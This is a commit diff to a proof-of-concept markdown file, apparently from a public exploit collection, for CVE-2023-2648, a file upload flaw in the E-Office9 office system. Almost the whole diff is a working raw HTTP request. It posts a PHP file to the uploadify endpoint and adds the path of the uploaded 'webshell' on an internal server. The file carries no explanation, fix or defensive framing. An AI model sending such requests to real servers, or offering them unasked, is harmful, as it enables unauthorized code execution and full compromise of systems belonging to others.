Update 某微E-Office9文件上传漏洞 CVE-2023-2648.md

2025-02-27 04:39:25 +00:00 · 2023-12-08 22:38:18 +08:00 · 2023-12-08 22:38:18 +08:00 · 070ef5f3bb
commit 070ef5f3bb
parent cd77554423
1 changed files with 21 additions and 7 deletions
--- a/CVE-2023-2648.md
+++ b/CVE-2023-2648.md
@ -2,18 +2,32 @@

 ```
 POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
-Host: 192.168.233.10:8082
-User-Agent: test
+Host: :8085
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
 Connection: close
-Content-Length: 493
-Accept-Encoding: gzip
-Content-Type: multipart/form-data
+Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
+Content-Length: 491

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
 Content-Disposition: form-data; name="Filedata"; filename="666.php"
 Content-Type: application/octet-stream

 <?php phpinfo();?>
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
+--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--
+```
+![2070a628d476b95724b6b017a3430a45](https://github.com/wy876/POC/assets/139549762/ea43a9b8-d146-49ae-86ce-f28e5b15c185)
+
+webshell路径
+```
+http://10.211.55.3:8082/attachment/1727543347/666.php
 ```